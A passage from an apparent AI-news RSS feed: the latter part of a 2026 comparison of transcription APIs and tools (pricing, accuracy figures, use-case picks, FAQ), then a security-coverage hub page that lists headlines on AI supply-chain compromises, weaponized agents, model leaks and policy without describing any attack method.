<p>File size limit is 25MB per request. Supported formats include MP3, MP4, WAV, WEBM. Output formats: JSON, SRT, VTT, or plain text. Speaker diarization is available via the gpt-4o-transcribe endpoint but was in beta as of early 2026.</p>
<h3 id="rev-ai">Rev AI</h3>
<p>Rev operates both an AI transcription API and a human transcription service, which is genuinely useful for high-stakes work.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Reverb ASR (English): $0.20/hr</li>
<li>Reverb Turbo: $0.10/hr</li>
<li>Reverb Foreign Language: $0.30/hr (55+ languages)</li>
<li>Whisper Fusion / Whisper Large: $0.005/min ($0.30/hr)</li>
<li>Human transcription: $1.99/min ($119.40/hr)</li>
<li>Free tier: 5 hours equivalent in free credits</li>
</ul>
<p>The Reverb model is Rev's proprietary ASR. Whisper Fusion and Whisper Large are what they say on the tin - Whisper-based models hosted by Rev. The human transcription option at $1.99/min is expensive but delivers 99%+ accuracy with a human review - appropriate for legal depositions, medical records, or any context where errors have real consequences.</p>
<p>The API is well-documented. Speaker diarization and confidence scores are included. Rev supports SRT, VTT, JSON, and text output.</p>
<h3 id="google-cloud-speech-to-text">Google Cloud Speech-to-Text</h3>
<p>Google's STT API offers two versions - V1 and V2. V2 adds Chirp, their multilingual model, and multi-region data residency.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Standard models: $0.024/min ($1.44/hr)</li>
<li>Enhanced models: $0.036/min ($2.16/hr)</li>
<li>Data logging opt-out: +40% to listed rates</li>
<li>First 60 minutes per month: free</li>
</ul>
<p>At $1.44/hr for standard, Google is more expensive than Deepgram, AssemblyAI, or OpenAI for equivalent accuracy. The real cost is higher once you factor in the full GCP stack - Cloud Storage, Cloud Functions, and egress fees can double the effective per-hour rate. Google's WER benchmark numbers (Microsoft-level, around 8-9% average) don't justify the price premium over dedicated speech APIs.</p>
<p>Google STT makes the most sense if you're already deep in GCP and the integration cost outweighs the per-minute savings from switching providers.</p>
<p><img src="/images/tools/best-ai-transcription-tools-2026-microphone.jpg" alt="A professional condenser microphone with headset in a recording studio">
<em>Speaker diarization accuracy matters most for multi-voice recordings - depositions, interviews, panels.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="professional-saas-transcription-tools">Professional SaaS Transcription Tools</h2>
<p>These tools trade API flexibility for a polished UI and editorial workflow. They're aimed at podcasters, journalists, researchers, and content teams rather than developers.</p>
<h3 id="sonix">Sonix</h3>
<p>Sonix is the strongest editor-focused option. The transcript editor is browser-based, clean, and genuinely useful - you can click any word to jump to that moment in the audio, assign speaker names, and export with word-level timestamps intact.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Standard (pay-per-use): $10/hr</li>
<li>Premium: $5/hr + $22/user/month subscription</li>
<li>Free trial: 30 minutes</li>
</ul>
<p>Sonix supports 53+ languages and exports SRT, VTT, TXT, and DOCX. Translation is available as an add-on. Accuracy is claimed at up to 99%, which likely refers to best-case English conditions. For podcasters and researchers who want a clean editing workflow without developer overhead, Sonix is hard to beat at this price.</p>
<h3 id="descript">Descript</h3>
<p>Descript takes a different approach. Rather than positioning itself as a transcription service, it's a video and audio editor where the transcript is the primary editing interface. Delete words from the transcript and the corresponding audio gets cut. It's a genuinely novel workflow for creators.</p>
<p><strong>Pricing (post-September 2025 restructure):</strong></p>
<ul>
<li>Free: 60 media minutes/month + 100 AI credits (one-time)</li>
<li>Paid tiers start at $16/month (Hobbyist)</li>
<li>Creator and Business tiers add more media minutes and AI credits</li>
</ul>
<p>Descript uses media minutes (upload/recording) and AI credits (AI processing) as its two resource pools since the September 2025 pricing overhaul. If you're a solo creator doing under an hour of content per month, the Hobbyist tier at $16/month covers most workflows. For heavier users, calculate your media minute consumption before committing.</p>
<p>Speaker labeling, noise reduction, and studio sound processing are built in. Export formats include SRT and VTT for captions. It isn't designed for bulk API ingestion - it's a creative tool for video and podcast producers.</p>
<h3 id="happyscribe">HappyScribe</h3>
<p>HappyScribe is an European-focused transcription service with strong subtitle support. It's popular among documentary filmmakers and broadcasters who need subtitle workflows with transcription.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Basic: €8.50/month (annual) - 120 AI minutes/month</li>
<li>Pro: €19/month (annual) - 600 AI minutes/month</li>
<li>Business: €59/month (annual) - 6,000 AI minutes/month</li>
<li>Pay-per-use top-ups: €0.20/min</li>
<li>Human proofreading: from €1.75/min</li>
</ul>
<p>All plans include unlimited meeting recording (up to 45 minutes per session on Basic). HappyScribe exports SRT, VTT, TXT, and DOCX. Human proofreading is available as an add-on, useful for broadcast media where accuracy requirements are high. Language support covers 60+ languages with subtitle timing built into the workflow.</p>
<p>The UI is polished and aimed at non-technical users. There's no developer API comparable to Deepgram or AssemblyAI.</p>
<h3 id="trint">Trint</h3>
<p>Trint targets newsrooms and media organizations. It's one of the older players in AI transcription - founded in 2014 - and has built out collaboration features that matter to editorial teams.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Starter: $52-80/month per seat (7 files/month)</li>
<li>Advanced: $60-100/month per seat (unlimited transcriptions)</li>
<li>Enterprise: custom</li>
</ul>
<p>Trint supports 31+ languages and has ISO 27001 certification, which matters for enterprise and media buyers. The AI assistant can create 400-word overviews of long transcripts. Real-time collaboration and API access are Enterprise-only features.</p>
<p>The per-seat subscription model is expensive compared to usage-based alternatives. For a team doing light transcription work, Trint's minimum viable plan at $52/month per user adds up fast. It earns its price in newsroom environments where the collaboration and security certifications matter.</p>
<hr>
<h2 id="the-whisper-open-source-option">The Whisper Open-Source Option</h2>
<p>Whisper (originally released by OpenAI in 2022) remains the reference point for open-source transcription. The large-v3 model delivers competitive accuracy for many use cases. Self-hosting is the draw - your audio never leaves your infrastructure.</p>
<p>The reality of self-hosting Whisper at scale isn't simple. You need GPU infrastructure, audio chunking logic for long files (Whisper processes in 30-second segments), concurrent request handling, and ongoing model management. Processing 1 hour of audio on an AWS GPU instance costs roughly $0.56 using the large model - comparable to Deepgram for small volumes, but without the infrastructure overhead factored in.</p>
<p>For a solo developer or researcher transcribing occasional files, running <code>whisper audio.mp3 --model large</code> locally is perfectly practical. For production workloads above a few hundred hours per month, the managed APIs offer better economics once engineering time is priced in.</p>
<p>Whisper doesn't support native real-time streaming. It's a batch-only option out of the box.</p>
<hr>
<h2 id="comparison-table">Comparison Table</h2>
<table>
  <thead>
      <tr>
          <th>Tool</th>
          <th>Type</th>
          <th>Price (per hr)</th>
          <th>WER (English avg)</th>
          <th>Real-Time</th>
          <th>Diarization</th>
          <th>SRT/VTT</th>
          <th>DOCX</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Deepgram Nova-3</td>
          <td>API</td>
          <td>$0.26 batch / $0.46 stream</td>
          <td>~8.4% (external)</td>
          <td>Yes</td>
          <td>+$0.12/hr</td>
          <td>Yes</td>
          <td>No (post-process)</td>
      </tr>
      <tr>
          <td>AssemblyAI Universal-3 Pro</td>
          <td>API</td>
          <td>$0.21 batch / $0.45 stream</td>
          <td>5.72%</td>
          <td>Yes</td>
          <td>+$0.02/hr</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>OpenAI gpt-4o-transcribe</td>
          <td>API</td>
          <td>$0.36</td>
          <td>2.46% (FLEURS)</td>
          <td>Limited</td>
          <td>Beta</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Rev AI (Reverb)</td>
          <td>API</td>
          <td>$0.20</td>
          <td>Not published</td>
          <td>Yes</td>
          <td>Included</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Rev AI (Human)</td>
          <td>Human</td>
          <td>$119.40</td>
          <td>~99%</td>
          <td>No</td>
          <td>Included</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Google Cloud STT</td>
          <td>API</td>
          <td>$1.44 standard</td>
          <td>~8-9%</td>
          <td>Yes</td>
          <td>Included (V2)</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Sonix</td>
          <td>SaaS</td>
          <td>$10</td>
          <td>Up to 99% (claimed)</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Descript</td>
          <td>SaaS</td>
          <td>$16+/mo plans</td>
          <td>Not published</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
      <tr>
          <td>HappyScribe</td>
          <td>SaaS</td>
          <td>€0.20/min (€12/hr)</td>
          <td>Not published</td>
          <td>No</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Trint</td>
          <td>SaaS</td>
          <td>$52-100/seat/mo</td>
          <td>Not published</td>
          <td>Enterprise</td>
          <td>Yes</td>
          <td>Yes</td>
          <td>Yes</td>
      </tr>
      <tr>
          <td>Whisper (self-hosted)</td>
          <td>Open Source</td>
          <td>~$0.56/hr (GPU)</td>
          <td>Competitive</td>
          <td>No</td>
          <td>No</td>
          <td>Yes</td>
          <td>No</td>
      </tr>
  </tbody>
</table>
<p><em>WER numbers from published benchmarks where available. FLEURS score for OpenAI reflects clean read speech - real-world performance is higher WER. &quot;Not published&quot; means no independent external benchmark found at time of writing.</em></p>
<hr>
<h2 id="best-pick-by-use-case">Best Pick by Use Case</h2>
<p><strong>Developers building voice pipelines:</strong> Deepgram Nova-3. The streaming API, low latency, and clean documentation are the right fit. Start with Pay As You Go at $0.0043/min and move to Growth pricing if volume justifies it.</p>
<p><strong>Teams needing maximum accuracy on challenging audio:</strong> AssemblyAI Universal-3 Pro. The edge in noisy audio and medical/legal vocabulary is measurable. The $0.21/hr base rate is reasonable given the accuracy differential.</p>
<p><strong>Already on OpenAI stack:</strong> gpt-4o-transcribe at $0.006/min. No new vendor onboarding, strong accuracy on clean audio, SRT and VTT output included. Acceptable tradeoff for most batch workflows.</p>
<p><strong>Podcast and video creators:</strong> Sonix for a dedicated transcription workflow, or Descript if you want to edit your content by editing the transcript. Both are consumer-grade tools that don't require API work.</p>
<p><strong>High-stakes accuracy (legal, medical, regulatory):</strong> Rev AI's human transcription at $1.99/min, or AssemblyAI Universal-3 Pro Medical mode combined with human review. Machine accuracy above 99% on clean audio isn't guaranteed by any provider - a human review layer remains necessary for documents with legal weight.</p>
<p><strong>European/broadcast media:</strong> HappyScribe for the subtitle workflow and GDPR-compliant hosting.</p>
<p><strong>Maximum data control:</strong> Self-hosted Whisper large-v3. Accept the infrastructure overhead and the lack of real-time streaming.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-transcription-api-is-most-accurate-in-2026">Which transcription API is most accurate in 2026?</h3>
<p>AssemblyAI Universal-3 Pro leads third-party English benchmarks with a 5.72% average WER (Feb 2026). OpenAI's gpt-4o-transcribe reports 2.46% WER on FLEURS, though that dataset uses clean read speech.</p>
<h3 id="does-deepgram-support-speaker-diarization">Does Deepgram support speaker diarization?</h3>
<p>Yes - speaker diarization is available as an add-on at $0.0020/min ($0.12/hr) on top of base Nova-3 pricing. It detects multiple speakers and labels segments by speaker ID.</p>
<h3 id="can-i-self-host-whisper-for-production-transcription">Can I self-host Whisper for production transcription?</h3>
<p>Yes, but at scale it requires GPU infrastructure, audio chunking logic, and concurrent request handling. For under 100 hours per month, self-hosting is cost-competitive. Above that, managed APIs are usually more economical when engineering time is factored in.</p>
<h3 id="what-output-formats-do-transcription-apis-support">What output formats do transcription APIs support?</h3>
<p>Most APIs output JSON with timestamps, plain text, SRT, and VTT. DOCX is common in SaaS tools (Sonix, HappyScribe) but not usually available from API providers without post-processing.</p>
<h3 id="which-tool-is-best-for-transcribing-non-english-audio">Which tool is best for transcribing non-English audio?</h3>
<p>ElevenLabs (8.75% multilingual WER) and AssemblyAI (9.78%) lead on multilingual benchmarks. Deepgram Nova-3 supports 36+ languages with a multilingual model at $0.0052/min pre-recorded. HappyScribe covers 60+ languages with subtitle workflow support.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.assemblyai.com/benchmarks">AssemblyAI Benchmarks (February 2026)</a> - English and multilingual WER data across 26 datasets</li>
<li><a href="https://www.assemblyai.com/pricing">AssemblyAI Pricing</a> - Universal-3 Pro, Universal-2, and streaming tier pricing</li>
<li><a href="https://deepgram.com/pricing">Deepgram Pricing</a> - Nova-3 per-minute rates, diarization add-on costs</li>
<li><a href="https://developers.openai.com/api/docs/pricing">OpenAI API Pricing</a> - gpt-4o-transcribe and gpt-4o-mini-transcribe per-minute rates</li>
<li><a href="https://www.rev.ai/pricing">Rev AI Pricing</a> - Reverb ASR, Whisper options, human transcription rates</li>
<li><a href="https://www.eesel.ai/blog/happyscribe-pricing">HappyScribe Pricing Plans</a> - Subscription tiers and pay-per-use rates</li>
<li><a href="https://sonix.ai/pricing">Sonix Pricing</a> - Standard and Premium tier pricing</li>
<li><a href="https://deepgram.com/learn/introducing-nova-3-speech-to-text-api">Deepgram Introducing Nova-3</a> - Nova-3 WER benchmark (5.26%)</li>
<li><a href="https://scribewave.com/blog/openai-launches-gpt-4o-transcribe-a-powerful-yet-limited-transcription-model">OpenAI gpt-4o-transcribe Launch Coverage</a> - gpt-4o-transcribe accuracy claims and analysis</li>
<li><a href="https://www.assemblyai.com/blog/assemblyai-vs-deepgram">AssemblyAI vs Deepgram Accuracy Comparison</a> - Head-to-head accuracy analysis</li>
<li><a href="https://cloud.google.com/speech-to-text/pricing">Google Cloud Speech-to-Text Pricing</a> - Standard and enhanced model rates</li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-transcription-tools-2026_hu_798b7a991e9de82b.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-transcription-tools-2026_hu_798b7a991e9de82b.jpg" width="1200" height="675"/></item><item><title>AI Security Research and Incident Coverage</title><link>https://awesomeagents.ai/security/</link><pubDate>Fri, 17 Apr 2026 13:16:34 +0200</pubDate><guid>https://awesomeagents.ai/security/</guid><description>&lt;p>AI systems are now part of critical infrastructure, and the attack surface has grown with them. Models leak training data, agents get weaponized into command-and-control channels, and every new SDK is a supply-chain hop waiting for a backdoored release. This hub tracks what we cover: the incidents, the research, and the patterns that keep repeating.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>AI systems are now part of critical infrastructure, and the attack surface has grown with them. Models leak training data, agents get weaponized into command-and-control channels, and every new SDK is a supply-chain hop waiting for a backdoored release. This hub tracks what we cover: the incidents, the research, and the patterns that keep repeating.</p>
<p>We cover AI security the way the industry actually experiences it - from the CVE to the aftermath. No vendor press releases, no theoretical threat models padded for word count. If a real compromise happened, we report it. If a paper describes a reproducible exploit, we read it and write about whether it matters.</p>
<h2 id="supply-chain-and-sdk-compromises">Supply-chain and SDK compromises</h2>
<p>SDKs and orchestration layers are where attackers reach the most keys per kilobyte of malicious code. Our most-read story of 2026 was a supply-chain compromise in a widely deployed LLM router, and the pattern has kept repeating.</p>
<ul>
<li><a href="/news/litellm-supply-chain-compromise-credential-theft/">LiteLLM supply-chain compromise drains developer credentials</a></li>
<li><a href="/news/llm-router-agent-supply-chain-attack/">LLM router agent supply-chain attack</a></li>
<li><a href="/news/roguepilot-github-copilot-supply-chain-attack/">RoguePilot: GitHub Copilot extension supply-chain attack</a></li>
<li><a href="/news/claude-code-npm-leak-claw-code-github-record/">Claude Code npm leak and &quot;Claw-Code&quot; GitHub record</a></li>
<li><a href="/news/hackerbot-claw-trivy-github-actions-compromise/">HackerBot: Claw, Trivy, and the GitHub Actions compromise</a></li>
</ul>
<p>Full catalog: <a href="/tags/supply-chain-attack/">/tags/supply-chain-attack/</a></p>
<h2 id="agents-and-assistants-weaponized">Agents and assistants weaponized</h2>
<p>When the attacker can use the same models you do, defender asymmetry goes to zero. We cover both sides - offensive research on agents that run exploits and defensive coverage of products meant to stop them.</p>
<ul>
<li><a href="/news/ai-assistants-weaponized-c2-proxies/">AI assistants weaponized as C2 proxies</a></li>
<li><a href="/news/ai-powered-cybercrime-fortigate-arxon-mcp/">Single operator uses DeepSeek and Claude to breach 600 FortiGate firewalls</a></li>
<li><a href="/news/kali-linux-claude-api-pentest-data-security/">Kali Linux integrates Claude for automated pentesting</a></li>
<li><a href="/news/bugtraceai-apex-26b-local-red-team-model/">BugTraceAI Apex: red-team LLM fits on a single RTX 3060</a></li>
<li><a href="/news/ai-hacker-600-fortinet-firewalls-breached/">AI hacker breaches 600 Fortinet firewalls in 5 weeks</a></li>
</ul>
<h2 id="model-vulnerabilities-and-data-leaks">Model vulnerabilities and data leaks</h2>
<p>Training-data extraction, jailbreaks that scale, and cloud misconfigurations that expose unreleased models.</p>
<ul>
<li><a href="/news/anthropic-mythos-capybara-leak/">Anthropic's Mythos model exposed via CMS misconfiguration</a></li>
<li><a href="/news/anthropic-claude-mythos-leaked-cybersecurity-risks/">Anthropic leak reveals Claude Mythos and cybersecurity risks</a></li>
<li><a href="/news/gemini-cli-x-account-hacked-cli-token-scam/">Gemini CLI X account hacked in CLI token scam</a></li>
<li><a href="/news/github-llm-malware-repos-software-zip/">GitHub LLM malware repositories</a></li>
<li><a href="/news/anthropic-distillation-attacks-deepseek-moonshot-minimax/">Anthropic says DeepSeek and Moonshot ran 24,000 fake accounts to steal Claude's capabilities</a></li>
</ul>
<h2 id="benchmarks-red-teams-and-disclosure">Benchmarks, red teams, and disclosure</h2>
<p>The security research side - what can actually be measured, where the public benchmarks fail, and how responsible disclosure plays out for AI systems.</p>
<ul>
<li><a href="/news/berkeley-agent-benchmarks-exploitable/">Every major AI agent benchmark can be hacked</a></li>
<li><a href="/news/agents-of-chaos-stanford-harvard-ai-agent-red-team/">Stanford-Harvard AI agent red team study</a></li>
<li><a href="/news/anthropic-project-glasswing-100m-cybersecurity/">Anthropic ships $100M AI cyber defense to 12 rivals</a></li>
<li><a href="/news/claude-code-auto-mode-agentic-safety/">Claude Code auto mode and agentic safety</a></li>
<li><a href="/news/linux-foundation-12m-ai-bug-slop/">Linux Foundation $12M to fight AI bug slop</a></li>
</ul>
<h2 id="policy-procurement-and-national-security">Policy, procurement, and national security</h2>
<p>Who is allowed to sell AI to whom, and what the government does when it decides something is a supply-chain risk.</p>
<ul>
<li><a href="/news/anthropic-sues-pentagon-blacklist/">Anthropic sues Pentagon over supply-chain blacklist</a></li>
<li><a href="/news/anthropic-wins-injunction-pentagon-ban/">Anthropic wins injunction against Pentagon ban</a></li>
<li><a href="/news/pentagon-formally-designates-anthropic-supply-chain-risk/">Pentagon formally designates Anthropic a supply-chain risk</a></li>
<li><a href="/news/google-openai-employees-letter-military-ai-limits/">Google and OpenAI employees letter limiting military AI</a></li>
<li><a href="/news/nist-ai-agent-standards-initiative/">NIST AI agent standards initiative</a></li>
</ul>
<h2 id="related-coverage">Related coverage</h2>
<p>Full catalogs are auto-updated on the tag pages:</p>
<ul>
<li><a href="/tags/security/">Security</a> - all security-adjacent coverage</li>
<li><a href="/tags/cybersecurity/">Cybersecurity</a> - attacks, defenses, threat intel</li>
<li><a href="/tags/supply-chain-attack/">Supply Chain Attack</a> - compromised packages, SDKs, agents</li>
<li><a href="/tags/ai-safety/">AI Safety</a> - alignment, oversight, red-team research</li>
<li><a href="/tags/vulnerabilities/">Vulnerabilities</a> - specific CVEs and disclosure stories</li>
<li><a href="/tags/prompt-injection/">Prompt Injection</a> - input-layer attacks</li>
</ul>
<h2 id="why-we-cover-this">Why we cover this</h2>
<p>Two things separate useful AI-security coverage from the noise. First, a beat editor who reads CVEs, research papers, and vendor advisories before the PR cycle picks them up. Second, reporting that does not flinch when the story implicates a lab we also cover favorably elsewhere. If we write about a new Claude release on a Tuesday and Anthropic ships a supply-chain miss on a Wednesday, you will read about both.</p>
<p>This page is the front door. For the firehose, see the <a href="/tags/security/">tag pages</a> above, or subscribe to the <a href="/">Awesome Agents</a> daily brief to get security stories as they happen.</p>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/security-hub_hu_af0fb06979a00250.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/security-hub_hu_af0fb06979a00250.jpg" width="1200" height="675"/></item></channel></rss>